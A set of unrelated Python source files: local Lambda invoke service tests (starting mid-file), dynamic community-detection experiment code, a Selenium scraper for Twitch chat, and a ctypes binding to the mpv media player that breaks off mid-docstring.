requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', json={"key1": "value1"}, headers={"Content-Type":"binary/octet-stream"}) actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 200) def test_function_executed_when_no_data_provided(self): expected = {} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations') actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 200) class TestLocalLambdaService_NotSupportedRequests(TestCase): @classmethod def setUpClass(cls): cls.code_abs_path = nodejs_lambda(ECHO_CODE) # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder cls.cwd = os.path.dirname(cls.code_abs_path) cls.code_uri = os.path.relpath(cls.code_abs_path, cls.cwd) # Get relative path with respect to CWD cls.function_name = "HelloWorld" cls.function = provider.Function(name=cls.function_name, runtime="nodejs4.3", memory=256, timeout=5, handler="index.handler", codeuri=cls.code_uri, environment=None, rolearn=None, layers=[]) cls.mock_function_provider = Mock() cls.mock_function_provider.get.return_value = cls.function cls.service, cls.port, cls.url, cls.scheme = make_service(cls.mock_function_provider, cls.cwd) cls.service.create() # import pdb; pdb.set_trace() t = threading.Thread(name='thread', target=cls.service.run, args=()) t.setDaemon(True) t.start() time.sleep(1) @classmethod def tearDownClass(cls): shutil.rmtree(cls.code_abs_path) def setUp(self): # Print full diff when comparing large dictionaries self.maxDiff = None def test_query_string_parameters_in_request(self): expected = {"Type": "User", "Message": "Query Parameters are not supported"} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', json={"key1": "value1"}, params={"key": "value"}) actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 400) self.assertEquals(response.headers.get('x-amzn-errortype'), 'InvalidRequestContent') self.assertEquals(response.headers.get('Content-Type'),'application/json') def test_payload_is_not_json_serializable(self): expected = {"Type": "User", "Message": "Could not parse request body into json: No JSON object could be decoded"} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', data='notat:asdfasdf') actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 400) self.assertEquals(response.headers.get('x-amzn-errortype'), 'InvalidRequestContent') self.assertEquals(response.headers.get('Content-Type'), 'application/json') def test_log_type_tail_in_request(self): expected = {"Type": "LocalService", "Message": "log-type: Tail is not supported. None is only supported."} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', headers={'X-Amz-Log-Type': 'Tail'}) actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 501) self.assertEquals(response.headers.get('Content-Type'), 'application/json') self.assertEquals(response.headers.get('x-amzn-errortype'), 'NotImplemented') def test_log_type_tail_in_request_with_lowercase_header(self): expected = {"Type": "LocalService", "Message": "log-type: Tail is not supported. None is only supported."} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', headers={'x-amz-log-type': 'Tail'}) actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 501) self.assertEquals(response.headers.get('Content-Type'), 'application/json') self.assertEquals(response.headers.get('x-amzn-errortype'), 'NotImplemented') def test_invocation_type_event_in_request(self): expected = {"Type": "LocalService", "Message": "invocation-type: Event is not supported. RequestResponse is only supported."} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', headers={'X-Amz-Invocation-Type': 'Event'}) actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 501) self.assertEquals(response.headers.get('Content-Type'), 'application/json') self.assertEquals(response.headers.get('x-amzn-errortype'), 'NotImplemented') def test_invocation_type_dry_run_in_request(self): expected = {"Type": "LocalService", "Message": "invocation-type: DryRun is not supported. RequestResponse is only supported."} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', headers={'X-Amz-Invocation-Type': 'DryRun'}) actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 501) self.assertEquals(response.headers.get('Content-Type'), 'application/json') self.assertEquals(response.headers.get('x-amzn-errortype'), 'NotImplemented') def test_generic_404_error_when_request_to_nonexisting_endpoint(self): expected_data = {'Type': 'LocalService', 'Message': 'PathNotFoundException'} response = requests.post(self.url + '/some/random/path/that/does/not/exist') actual_data = response.json() self.assertEquals(actual_data, expected_data) self.assertEquals(response.status_code, 404) self.assertEquals(response.headers.get('x-amzn-errortype'), 'PathNotFoundLocally') def test_generic_405_error_when_request_path_with_invalid_method(self): expected_data = {'Type': 'LocalService', 'Message': 'MethodNotAllowedException'} response = requests.get(self.url + '/2015-03-31/functions/HelloWorld/invocations') actual_data = response.json() self.assertEquals(actual_data, expected_data) self.assertEquals(response.status_code, 405) self.assertEquals(response.headers.get('x-amzn-errortype'), 'MethodNotAllowedLocally') def make_service(function_provider, cwd): port = random_port() manager = ContainerManager() layer_downloader = LayerDownloader("./", "./") image_builder = LambdaImage(layer_downloader, False) local_runtime = LambdaRuntime(manager, image_builder) lambda_runner = LocalLambdaRunner(local_runtime=local_runtime, function_provider=function_provider, cwd=cwd) service = LocalLambdaInvokeService(lambda_runner, port=port, host='127.0.0.1') scheme = "http" url = '{}://127.0.0.1:{}'.format(scheme, port) return service, port, url, scheme def random_port(): return random.randint(30000, 40000)
experiments.py
import matplotlib.pyplot as plt def _get_return(function, x, y, return_var): return_var.append(function(x, elapsed_time=y)) from tnetwork.DCD.analytics.dynamic_partition import * from sklearn.metrics import adjusted_rand_score,f1_score import pandas as pd import os import numpy as np import pickle # def standard_methods_to_test(): # eng = engine.start_matlab() # # def smoothed_louvain(x, elapsed_time=True): # return tn.DCD.iterative_match(x, CDalgo="smoothedLouvain", elapsed_time=elapsed_time) # # # methods_to_test = {"iterative":DCD.iterative_match,"dynamo":dynamo,"dynmoga":dynmoga,"smoothed_louvain":smoothed_louvain} # # def mucha_opti(x, elapsed_time=True): # return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng) # # def mucha_global(x, elapsed_time=True): # return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng, form="global") # # print("pas de mucha") # methods_to_test = {"iterative": tn.DCD.iterative_match, # "dynamo": dynamo, # "smoothed_louvain": smoothed_louvain, # "mucha": mucha_opti, # "mucha_global":mucha_global, # "survival_graph": tn.DCD.match_survival_graph} # ,"dynmoga":dynmoga}# # # # methods_to_test = {"smoothed_louvain":smoothed_louvain}#,"dynmoga":dynmoga}# # return methods_to_test def compute_all_stats(all_infos, detailed=True): """ :param all_infos: :param detailed: :return: """ names = [] times = [] LAMI = [] LARI = [] #LNMI = [] #LF1 = [] nb_changes = [] # entropies = [] ent_by_nodes = [] S = [] modularities = [] nmis = [] ARIs = [] #F1s = [] nb_nodes = [] nb_steps = [] IDs = {} for id,an_experiment in all_infos.items(): GT_as_sn = an_experiment["GT"] dyn_graph_sn=an_experiment["graph"] if "result" not in an_experiment: results={} else: results = an_experiment["result"] iteration = an_experiment["ID"] print(id) for name, (result, time) in results.items(): print(name) for k, v in iteration.items(): IDs.setdefault(k,[]) IDs[k].append(v) names.append(name) times.append(time["total"]) nb_steps.append(len(dyn_graph_sn.snapshots())) nb_nodes.append(len(dyn_graph_sn.snapshots(dyn_graph_sn.snapshots_timesteps()[0]).nodes)) if detailed: LAMI.append(longitudinal_similarity(GT_as_sn, result)) # def nf1go(x, y): # a = NF1(y, x) # score = a.get_f1()[0] # return score #LF1.append(longitudinal_similarity(GT_as_sn,result,score=f1_score(),convert_coms_sklearn_format=False)) #LAMI.append(longitudinal_similarity(GT_as_sn, result)) LARI.append(longitudinal_similarity(GT_as_sn, result, score=adjusted_rand_score)) nb_changes.append(nb_node_change(result)) consecutive_NMIs = consecutive_sn_similarity(result) #entropies.append(entropy(result)) ent_by_nodes.append(entropy_by_node(result)) #####Slow S.append(np.average(consecutive_NMIs[0], weights=consecutive_NMIs[1])) mods = quality_at_each_step(result, dyn_graph_sn) modularities.append(np.average(mods[0], weights=mods[1])) sim = similarity_at_each_step(GT_as_sn,result) nmis.append(np.average(sim[0],weights=sim[1])) rand = similarity_at_each_step(GT_as_sn,result,score=adjusted_rand_score) ARIs.append(np.average(rand[0],weights=rand[1])) #sim = similarity_at_each_step(GT_as_sn,result,score=f1_score()) #F1s.append(np.average(sim[0],weights=sim[1])) df = pd.DataFrame() df["algorithm"] = names df["running time"] = times print(names) if detailed: print(LAMI) df["LAMI"] = LAMI #df["LF1"] = LF1 #df["LNMI"] = LNMI df["LARI"] = LARI df["SM-N"] = nb_changes #df["I_old"] = entropies df["SM-L"] = ent_by_nodes df["SM-P"] = S df["Q"] = modularities df["AMI"] = nmis df["ARI"] = ARIs #df["F1"] = F1s df["# nodes"] = nb_nodes df["# steps"] = nb_steps for k,l in IDs.items(): df[k]=l return df def run_all_algos(methods_to_test, dyn_graph_sn, plot=False, waiting=120): """ :param methods_to_test: :param dyn_graph_sn: :param plot: :param waiting: :return: """ results = {} methods_this_step = {name: m for name, m in methods_to_test.items()} for name, m in methods_this_step.items(): results[name] = m(dyn_graph_sn, elapsed_time=True) # manager = multiprocessing.Manager() # temp = manager.list() # p = multiprocessing.Process(target=_get_return, args=(m,dyn_graph_sn,True,temp)) # p.start() # p.join(waiting) # if p.is_alive(): # print ("running... let's kill it...") # del methods_to_test[name] # Terminate # p.terminate() # p.join() # else: # results[name] = temp[0] if plot!=False: #dyn_graph = dyn_graph_sn.to_DynGraphIG(sn_duration=1) p = tn.plot_longitudinal(dyn_graph_sn, results[name][0])#.to_DynCommunitiesIG(1)) location = os.path.join(plot,name+".png") p.savefig(location, bbox_inches='tight') plt.clf() if plot: pickle.dump(results,open(os.path.join(plot,"result.pickle"),"wb")) return results def subset(graph, com, length): subgraph = tn.DynGraphSN(list(graph.snapshots().values())[:length]) subcomsGT = tn.DynCommunitiesSN() for t in subgraph.snapshots_timesteps(): subcomsGT.set_communities(t, com.snapshot_communities(t)) return (subgraph, subcomsGT)
ChatBot.py
from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.firefox.options import Options from selenium.webdriver.common.keys import Keys import pickle from datetime import datetime from datetime import timedelta import time import pathlib import os import math from colorama import init from threading import Thread init() class ChatBot: browser = None channel = '' error = 0 isReady = 0 refreshHour = None isClosed = 0 callback_error = None chat_message_callback = None stored_msgs = [] avg_delay = 0 mps = 0 automatic_list = True def auto_list(self): self.list_chat() self.list_deleted() time.sleep(0.1) Thread(target=self.auto_list).start() def empty_callback_error(self, function, channel, msg, info = ''): print(function, msg, info) def __init__(self, channel, chat_message_callback = None): try: self.channel = channel.strip() self.chat_message_callback = chat_message_callback except Exception as e: self.error = 1 self.callback_error('ChatBot.py > __init__()', self.channel, str(e), '') def start(self): try: print('\x1b[2;30;46m' + 'Iniciando: ' + self.channel + '\x1b[0m') if self.callback_error == None: self.callback_error = self.empty_callback_error options = Options() options.add_argument("--start-minimized") options.add_argument('--headless') options.add_argument('--disable-gpu') self.browser = webdriver.Firefox(options=options) self.browser.install_addon(os.path.join(pathlib.Path(__file__).parent.resolve(), 'betterttv-7.4.25-fx.xpi')) url = 'https://www.twitch.tv/popout/' + self.channel + '/chat?popout=' self.browser.get(url.lower()) self.refreshHour = datetime.now() + timedelta(minutes=60) self.isReady = 1 print('Configuração concluída') if self.automatic_list: self.auto_list() except Exception as e: self.error = 1 self.callback_error('ChatBot.py > start()', self.channel, str(e), '') def close(self): try: self.isClosed = 1 self.browser.close() self.browser.quit() del self.browser try: del self except Exception as e: print('del self - ' + self.channel + ' ' + str(e)) except Exception as e: self.callback_error('ChatBot.py > close()', self.channel, str(e), '') def list_deleted(self): msgs = [] try: if len(self.browser.find_elements(By.CLASS_NAME, 'chat-line__message--deleted-notice')) > 0: chatElements = self.browser.find_elements(By.CLASS_NAME, 'captured') for chatElement in chatElements: if (chatElement != []): message = "" for chatText in chatElement.find_elements(By.CLASS_NAME, 'chat-line__message--deleted-notice'): message += chatText.text self.browser.execute_script( "var element = arguments[0];" + "if (element.className.includes('chat-line__message--deleted-notice'))" + "{element.setAttribute('class','');}", chatText) if (message == 'message excluída por um moderador.'): msgs.append(chatElement.get_attribute("id")) self.browser.execute_script( "var element = arguments[0];" + "if (element.className === 'captured')" + "{element.setAttribute('class','del');}", chatElement) except Exception as e: self.callback_error('ChatBot.py > listDeleted()', self.channel, str(e), '') return msgs def calc_duration(function): def wrapper(*args, **kwargs): start_time = time.time() result = function(*args, **kwargs) result['delay'] = int((time.time() - start_time) * 1000) return result return wrapper @calc_duration def process_messges(self, chatElement): chatMsg = { "id": "", "channel": "", "user": "", "message": "", "badges": [], "emotes": [], "datetime": "", "color": "" } try: chatMsg['channel'] = self.channel chatMsg['datetime'] = datetime.now() chatMsg['id'] = hex(int(chatMsg['datetime'].strftime("%Y%m%d%H%M%S%f")) - 20000000000000000000).replace('0x', '') except Exception as e: self.callback_error('ChatBot.py > process_messges() > configurando', self.channel, str(e), str(chatElement.get_attribute('innerHTML'))) try: for chatUser in chatElement.find_elements(By.CLASS_NAME, 'chat-author__display-name'): chatMsg['user'] = chatUser.text chatMsg['color'] = chatUser.get_attribute("style") except Exception as e: self.callback_error('ChatBot.py > process_messges() > usuário e cor', self.channel, str(e), str(chatElement.get_attribute('innerHTML'))) try: message = "" for chatText in chatElement.find_elements(By.CSS_SELECTOR, ".text-fragment, .link-fragment, .mention-fragment, .chat-line__message--deleted-notice, .chat-line__message--emote"): if "chat-line__message--emote" in chatText.get_attribute("class"): try: chatMsg['emotes'].append({"alt": chatText.get_attribute("alt"), "src": chatText.get_attribute("src")}) message += chatText.get_attribute("alt") message += ' ' except: pass else: message += chatText.text + ' ' chatMsg['message'] = message.strip() except Exception as e: self.callback_error('ChatBot.py > process_messges() > message e emotes', self.channel, str(e), str(chatElement.get_attribute('innerHTML'))) try: for badgeElement in chatElement.find_elements(By.CLASS_NAME, 'chat-badge'): src = badgeElement.get_attribute("src") src = src[0: len(src) - 1] + '2' alt = badgeElement.get_attribute("alt") chatMsg['badges'].append({"src": src, "alt": alt}) except Exception as e: self.callback_error('ChatBot.py > process_messges() > capturar badges', self.channel, str(e), str(chatElement.get_attribute('innerHTML'))) try: self.browser.execute_script( "let element = arguments[0];" + "let clsname = element.className;" "if (clsname.includes('chat-line__message') || clsname.includes('chat-line--inline'))" + "{element.setAttribute('class','captured');" + "element.setAttribute('id','" + chatMsg['id'] + "');}", chatElement) except Exception as e: self.callback_error('ChatBot.py > process_messges() > executar script de captura', self.channel, str(e), str(chatElement.get_attribute('innerHTML'))) return chatMsg def list_chat(self): msgs = [] try: if (self.channel.lower() in self.browser.current_url.lower()): chatElements = self.browser.find_elements(By.CLASS_NAME, 'chat-line__message') for chatElement in chatElements: if (chatElement != []): chatMsg = self.process_messges(chatElement) msgs.append(chatMsg) if self.chat_message_callback != None: self.chat_message_callback(chatMsg) chatElement = [] self.stored_msgs.append({ 'delay': chatMsg['delay'], 'datetime': datetime.now() }) self.stored_msgs = self.stored_msgs[-100:] delay_total = 0 for msg in self.stored_msgs: delay_total += msg['delay'] self.avg_delay = int(delay_total / len(self.stored_msgs)) if len(self.stored_msgs) > 10: stored_time = abs(self.stored_msgs[-1]['datetime']-self.stored_msgs[0]['datetime']).seconds self.mps = len(self.stored_msgs) / stored_time factor = 10.0 ** 2 self.mps = math.trunc(self.mps * factor) / factor else: self.error = 1 except Exception as e: self.callback_error('ChatBot.py > listChat()', self.channel, str(e), '') self.error = 1 if self.isReady: # recarrega a pagina em um tempo determinado if (datetime.now() >= self.refreshHour): try: self.refreshHour = datetime.now() + timedelta(minutes=60) self.browser.refresh() time.sleep(1) except Exception as e: self.callback_error('ChatBot.py > listChat() > refresh', self.channel, str(e), '') ################################################# return msgs
mpv.py
# -*- coding: utf-8 -*- ''' Python interface to the awesome mpv media player Created on 2017-02-19 @author: jaseg forked from: https://github.com/jaseg/python-mpv ''' from ctypes import * import ctypes.util import threading import os import sys from warnings import warn from functools import partial import collections import re import traceback # vim: ts=4 sw=4 et if os.name == 'nt': backend = CDLL('mpv-1.dll') fs_enc = 'utf-8' else: import locale lc, enc = locale.getlocale(locale.LC_NUMERIC) # libmpv requires LC_NUMERIC to be set to "C". Since messing with global variables everyone else relies upon is # still better than segfaulting, we are setting LC_NUMERIC to "C". locale.setlocale(locale.LC_NUMERIC, 'C') sofile = ctypes.util.find_library('mpv') if sofile is None: raise OSError("Cannot find libmpv in the usual places. Depending on your distro, you may try installing an " "mpv-devel or mpv-libs package. If you have libmpv around but this script can't find it, maybe consult " "the documentation for ctypes.util.find_library which this script uses to look up the library " "filename.") backend = CDLL(sofile) fs_enc = sys.getfilesystemencoding() class MpvHandle(c_void_p): pass class MpvOpenGLCbContext(c_void_p): pass class PropertyUnavailableError(AttributeError): pass class ErrorCode(object): """ For documentation on these, see mpv's libmpv/client.h """ SUCCESS = 0 EVENT_QUEUE_FULL = -1 NOMEM = -2 UNINITIALIZED = -3 INVALID_PARAMETER = -4 OPTION_NOT_FOUND = -5 OPTION_FORMAT = -6 OPTION_ERROR = -7 PROPERTY_NOT_FOUND = -8 PROPERTY_FORMAT = -9 PROPERTY_UNAVAILABLE = -10 PROPERTY_ERROR = -11 COMMAND = -12 EXCEPTION_DICT = { 0: None, -1: lambda *a: MemoryError('mpv event queue full', *a), -2: lambda *a: MemoryError('mpv cannot allocate memory', *a), -3: lambda *a: ValueError('Uninitialized mpv handle used', *a), -4: lambda *a: ValueError('Invalid value for mpv parameter', *a), -5: lambda *a: AttributeError('mpv option does not exist', *a), -6: lambda *a: TypeError('Tried to set mpv option using wrong format', *a), -7: lambda *a: ValueError('Invalid value for mpv option', *a), -8: lambda *a: AttributeError('mpv property does not exist', *a), # Currently (mpv 0.18.1) there is a bug causing a PROPERTY_FORMAT error to be returned instead of # INVALID_PARAMETER when setting a property-mapped option to an invalid value. -9: lambda *a: TypeError('Tried to get/set mpv property using wrong format, or passed invalid value', *a), -10: lambda *a: PropertyUnavailableError('mpv property is not available', *a), -11: lambda *a: RuntimeError('Generic error getting or setting mpv property', *a), -12: lambda *a: SystemError('Error running mpv command', *a) } @staticmethod def default_error_handler(ec, *args): return ValueError(_mpv_error_string(ec).decode('utf-8'), ec, *args) @classmethod def raise_for_ec(kls, ec, func, *args): ec = 0 if ec > 0 else ec ex = kls.EXCEPTION_DICT.get(ec , kls.default_error_handler) if ex: raise ex(ec, *args) class MpvFormat(c_int): NONE = 0 STRING = 1 OSD_STRING = 2 FLAG = 3 INT64 = 4 DOUBLE = 5 NODE = 6 NODE_ARRAY = 7 NODE_MAP = 8 BYTE_ARRAY = 9 def __eq__(self, other): return self is other or self.value == other or self.value == int(other) def __repr__(self): return ['NONE', 'STRING', 'OSD_STRING', 'FLAG', 'INT64', 'DOUBLE', 'NODE', 'NODE_ARRAY', 'NODE_MAP', 'BYTE_ARRAY'][self.value] class MpvEventID(c_int): NONE = 0 SHUTDOWN = 1 LOG_MESSAGE = 2 GET_PROPERTY_REPLY = 3 SET_PROPERTY_REPLY = 4 COMMAND_REPLY = 5 START_FILE = 6 END_FILE = 7 FILE_LOADED = 8 TRACKS_CHANGED = 9 TRACK_SWITCHED = 10 IDLE = 11 PAUSE = 12 UNPAUSE = 13 TICK = 14 SCRIPT_INPUT_DISPATCH = 15 CLIENT_MESSAGE = 16 VIDEO_RECONFIG = 17 AUDIO_RECONFIG = 18 METADATA_UPDATE = 19 SEEK = 20 PLAYBACK_RESTART = 21 PROPERTY_CHANGE = 22 CHAPTER_CHANGE = 23 ANY = ( SHUTDOWN, LOG_MESSAGE, GET_PROPERTY_REPLY, SET_PROPERTY_REPLY, COMMAND_REPLY, START_FILE, END_FILE, FILE_LOADED, TRACKS_CHANGED, TRACK_SWITCHED, IDLE, PAUSE, UNPAUSE, TICK, SCRIPT_INPUT_DISPATCH, CLIENT_MESSAGE, VIDEO_RECONFIG, AUDIO_RECONFIG, METADATA_UPDATE, SEEK, PLAYBACK_RESTART, PROPERTY_CHANGE, CHAPTER_CHANGE ) def __repr__(self): return ['NONE', 'SHUTDOWN', 'LOG_MESSAGE', 'GET_PROPERTY_REPLY', 'SET_PROPERTY_REPLY', 'COMMAND_REPLY', 'START_FILE', 'END_FILE', 'FILE_LOADED', 'TRACKS_CHANGED', 'TRACK_SWITCHED', 'IDLE', 'PAUSE', 'UNPAUSE', 'TICK', 'SCRIPT_INPUT_DISPATCH', 'CLIENT_MESSAGE', 'VIDEO_RECONFIG', 'AUDIO_RECONFIG', 'METADATA_UPDATE', 'SEEK', 'PLAYBACK_RESTART', 'PROPERTY_CHANGE', 'CHAPTER_CHANGE'][self.value] class MpvNodeList(Structure): def array_value(self, decode_str=False): return [ self.values[i].node_value(decode_str) for i in range(self.num) ] def dict_value(self, decode_str=False): return { self.keys[i].decode('utf-8'): self.values[i].node_value(decode_str) for i in range(self.num) } class MpvNode(Structure): _fields_ = [('val', c_longlong), ('format', MpvFormat)] def node_value(self, decode_str=False): return MpvNode.node_cast_value(byref(c_void_p(self.val)), self.format.value, decode_str) @staticmethod def node_cast_value(v, fmt, decode_str=False): dwrap = lambda s: s.decode('utf-8') if decode_str else s return { MpvFormat.NONE: lambda v: None, MpvFormat.STRING: lambda v: dwrap(cast(v, POINTER(c_char_p)).contents.value), MpvFormat.OSD_STRING: lambda v: cast(v, POINTER(c_char_p)).contents.value.decode('utf-8'), MpvFormat.FLAG: lambda v: bool(cast(v, POINTER(c_int)).contents.value), MpvFormat.INT64: lambda v: cast(v, POINTER(c_longlong)).contents.value, MpvFormat.DOUBLE: lambda v: cast(v, POINTER(c_double)).contents.value, MpvFormat.NODE: lambda v: cast(v, POINTER(MpvNode)).contents.node_value(decode_str), MpvFormat.NODE_ARRAY: lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.array_value(decode_str), MpvFormat.NODE_MAP: lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.dict_value(decode_str), MpvFormat.BYTE_ARRAY: lambda v: cast(v, POINTER(c_char_p)).contents.value, }[fmt](v) MpvNodeList._fields_ = [('num', c_int), ('values', POINTER(MpvNode)), ('keys', POINTER(c_char_p))] class MpvSubApi(c_int): MPV_SUB_API_OPENGL_CB = 1 class MpvEvent(Structure): _fields_ = [('event_id', MpvEventID), ('error', c_int), ('reply_userdata', c_ulonglong), ('data', c_void_p)] def as_dict(self): dtype = {MpvEventID.END_FILE: MpvEventEndFile, MpvEventID.PROPERTY_CHANGE: MpvEventProperty, MpvEventID.GET_PROPERTY_REPLY: MpvEventProperty, MpvEventID.LOG_MESSAGE: MpvEventLogMessage, MpvEventID.SCRIPT_INPUT_DISPATCH: MpvEventScriptInputDispatch, MpvEventID.CLIENT_MESSAGE: MpvEventClientMessage }.get(self.event_id.value, None) return {'event_id': self.event_id.value, 'error': self.error, 'reply_userdata': self.reply_userdata, 'event': cast(self.data, POINTER(dtype)).contents.as_dict() if dtype else None} class MpvEventProperty(Structure): _fields_ = [('name', c_char_p), ('format', MpvFormat), ('data', c_void_p)] def as_dict(self): if self.format.value == MpvFormat.STRING: proptype, _access = ALL_PROPERTIES.get(self.name, (str, None)) return {'name': self.name.decode('utf-8'), 'format': self.format, 'data': self.data, 'value': proptype(cast(self.data, POINTER(c_char_p)).contents.value.decode('utf-8'))} else: return {'name': self.name.decode('utf-8'), 'format': self.format, 'data': self.data} class MpvEventLogMessage(Structure): _fields_ = [('prefix', c_char_p), ('level', c_char_p), ('text', c_char_p)] def as_dict(self): return { 'prefix': self.prefix.decode('utf-8'), 'level': self.level.decode('utf-8'), 'text': self.text.decode('utf-8').rstrip() } class MpvEventEndFile(c_int): EOF_OR_INIT_FAILURE = 0 RESTARTED = 1 ABORTED = 2 QUIT = 3 def as_dict(self): return {'reason': self.value} class MpvEventScriptInputDispatch(Structure): _fields_ = [('arg0', c_int), ('type', c_char_p)] def as_dict(self): pass # TODO class MpvEventClientMessage(Structure): _fields_ = [('num_args', c_int), ('args', POINTER(c_char_p))] def as_dict(self): return { 'args': [ self.args[i].decode('utf-8') for i in range(self.num_args) ] } WakeupCallback = CFUNCTYPE(None, c_void_p) OpenGlCbUpdateFn = CFUNCTYPE(None, c_void_p) OpenGlCbGetProcAddrFn = CFUNCTYPE(None, c_void_p, c_char_p) def _handle_func(name, args, restype, errcheck, ctx=MpvHandle): func = getattr(backend, name) func.argtypes = [ctx] + args if ctx else args if restype is not None: func.restype = restype if errcheck is not None: func.errcheck = errcheck globals()['_'+name] = func def bytes_free_errcheck(res, func, *args): notnull_errcheck(res, func, *args) rv = cast(res, c_void_p).value _mpv_free(res) return rv def notnull_errcheck(res, func, *args): if res is None: raise RuntimeError('Underspecified error in MPV when calling {} with args {!r}: NULL pointer returned.'\ 'Please consult your local debugger.'.format(func.__name__, args)) return res ec_errcheck = ErrorCode.raise_for_ec def _handle_gl_func(name, args=[], restype=None): _handle_func(name, args, restype, errcheck=None, ctx=MpvOpenGLCbContext) backend.mpv_client_api_version.restype = c_ulong def _mpv_client_api_version(): ver = backend.mpv_client_api_version() return ver>>16, ver&0xFFFF backend.mpv_free.argtypes = [c_void_p] _mpv_free = backend.mpv_free backend.mpv_free_node_contents.argtypes = [c_void_p] _mpv_free_node_contents = backend.mpv_free_node_contents backend.mpv_create.restype = MpvHandle _mpv_create = backend.mpv_create _handle_func('mpv_create_client', [c_char_p], MpvHandle, notnull_errcheck) _handle_func('mpv_client_name', [], c_char_p, errcheck=None) _handle_func('mpv_initialize', [], c_int, ec_errcheck) _handle_func('mpv_detach_destroy', [], None, errcheck=None) _handle_func('mpv_terminate_destroy', [], None, errcheck=None) _handle_func('mpv_load_config_file', [c_char_p], c_int, ec_errcheck) _handle_func('mpv_suspend', [], None, errcheck=None) _handle_func('mpv_resume', [], None, errcheck=None) _handle_func('mpv_get_time_us', [], c_ulonglong, errcheck=None) _handle_func('mpv_set_option', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck) _handle_func('mpv_set_option_string', [c_char_p, c_char_p], c_int, ec_errcheck) _handle_func('mpv_command', [POINTER(c_char_p)], c_int, ec_errcheck) _handle_func('mpv_command_string', [c_char_p, c_char_p], c_int, ec_errcheck) _handle_func('mpv_command_async', [c_ulonglong, POINTER(c_char_p)], c_int, ec_errcheck) _handle_func('mpv_set_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck) _handle_func('mpv_set_property_string', [c_char_p, c_char_p], c_int, ec_errcheck) _handle_func('mpv_set_property_async', [c_ulonglong, c_char_p, MpvFormat,c_void_p],c_int, ec_errcheck) _handle_func('mpv_get_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck) _handle_func('mpv_get_property_string', [c_char_p], c_void_p, bytes_free_errcheck) _handle_func('mpv_get_property_osd_string', [c_char_p], c_void_p, bytes_free_errcheck) _handle_func('mpv_get_property_async', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck) _handle_func('mpv_observe_property', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck) _handle_func('mpv_unobserve_property', [c_ulonglong], c_int, ec_errcheck) _handle_func('mpv_event_name', [c_int], c_char_p, errcheck=None, ctx=None) _handle_func('mpv_error_string', [c_int], c_char_p, errcheck=None, ctx=None) _handle_func('mpv_request_event', [MpvEventID, c_int], c_int, ec_errcheck) _handle_func('mpv_request_log_messages', [c_char_p], c_int, ec_errcheck) _handle_func('mpv_wait_event', [c_double], POINTER(MpvEvent), errcheck=None) _handle_func('mpv_wakeup', [], None, errcheck=None) _handle_func('mpv_set_wakeup_callback', [WakeupCallback, c_void_p], None, errcheck=None) _handle_func('mpv_get_wakeup_pipe', [], c_int, errcheck=None) _handle_func('mpv_get_sub_api', [MpvSubApi], c_void_p, notnull_errcheck) _handle_gl_func('mpv_opengl_cb_set_update_callback', [OpenGlCbUpdateFn, c_void_p]) _handle_gl_func('mpv_opengl_cb_init_gl', [c_char_p, OpenGlCbGetProcAddrFn, c_void_p], c_int) _handle_gl_func('mpv_opengl_cb_draw', [c_int, c_int, c_int], c_int) _handle_gl_func('mpv_opengl_cb_render', [c_int, c_int], c_int) _handle_gl_func('mpv_opengl_cb_report_flip', [c_ulonglong], c_int) _handle_gl_func('mpv_opengl_cb_uninit_gl', [], c_int) def _ensure_encoding(possibly_bytes): return possibly_bytes.decode('utf-8') if type(possibly_bytes) is bytes else possibly_bytes def _event_generator(handle): while True: event = _mpv_wait_event(handle, -1).contents if event.event_id.value == MpvEventID.NONE: raise StopIteration() yield event def load_lua(): """ Use this function if you intend to use mpv's built-in lua interpreter. This is e.g. needed for playback of youtube urls. """ CDLL('liblua.so', mode=RTLD_GLOBAL) def _event_loop(event_handle, playback_cond, event_callbacks, message_handlers, property_handlers, log_handler): for event in _event_generator(event_handle): try: devent = event.as_dict() # copy data from ctypes eid = devent['event_id'] for callback in event_callbacks: callback(devent) if eid in (MpvEventID.SHUTDOWN, MpvEventID.END_FILE): with playback_cond: playback_cond.notify_all() if eid == MpvEventID.PROPERTY_CHANGE: pc = devent['event'] name = pc['name'] if 'value' in pc: proptype, _access = ALL_PROPERTIES[name] if proptype is bytes: args = (pc['value'],) else: args = (proptype(_ensure_encoding(pc['value'])),) elif pc['format'] == MpvFormat.NONE: args = (None,) else: args = (pc['data'], pc['format']) for handler in property_handlers[name]: handler(*args) if eid == MpvEventID.LOG_MESSAGE and log_handler is not None: ev = devent['event'] log_handler(ev['level'], ev['prefix'], ev['text']) if eid == MpvEventID.CLIENT_MESSAGE: # {'event': {'args': ['key-binding', 'foo', 'u-', 'g']}, 'reply_userdata': 0, 'error': 0, 'event_id': 16} target, *args = devent['event']['args'] if target in message_handlers: message_handlers[target](*args) if eid == MpvEventID.SHUTDOWN: _mpv_detach_destroy(event_handle) return except Exception as e: traceback.print_exc() class MPV(object): """ See man mpv(1) for the details of the implemented commands. """ def __init__(self, *extra_mpv_flags, log_handler=None, start_event_thread=True, **extra_mpv_opts): """ Create an MPV instance. Extra arguments 